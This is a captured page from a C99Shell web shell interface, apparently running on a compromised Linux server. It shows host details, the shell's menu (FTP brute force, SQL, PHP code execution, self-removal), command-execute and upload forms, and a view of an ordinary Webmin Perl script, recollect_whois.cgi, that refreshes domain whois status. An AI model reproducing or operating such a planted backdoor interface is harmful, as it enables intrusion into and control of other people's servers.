!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 26.91 GB of 117.98 GB (22.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     recollect_whois.cgi (761 B)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# recollect_whois.cgi
# Refreshes given domains whois status

require './virtual-server-lib.pl';
&ReadParse();
my $domsstr = $in{'doms'};
if ($domsstr) {
    my @doms = split(" ", $domsstr);
    foreach my $dom (@doms) {
        $d = &get_domain_by('dom', $dom);
        next if (!$d);
        next if (!&can_edit_domain($d));
        if ($in{'ignore'}) {
            # Ignore expiry forever
            $d->{'whois_ignore'} = 1;
            }
        else {
            # Re-check expiry time
            my $now = time();
            my ($exp, $err) = &get_whois_expiry($d);
            $d->{'whois_next'} = $now + 7*24*60*60 + int(rand(24*60*60));
            $d->{'whois_last'} = $now;
            $d->{'whois_err'} = $err;
            $d->{'whois_expiry'} = $exp;
            delete($d->{'whois_ignore'});
            }
        &save_domain($d);
        }
    }
&redirect(&get_referer_relative());


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--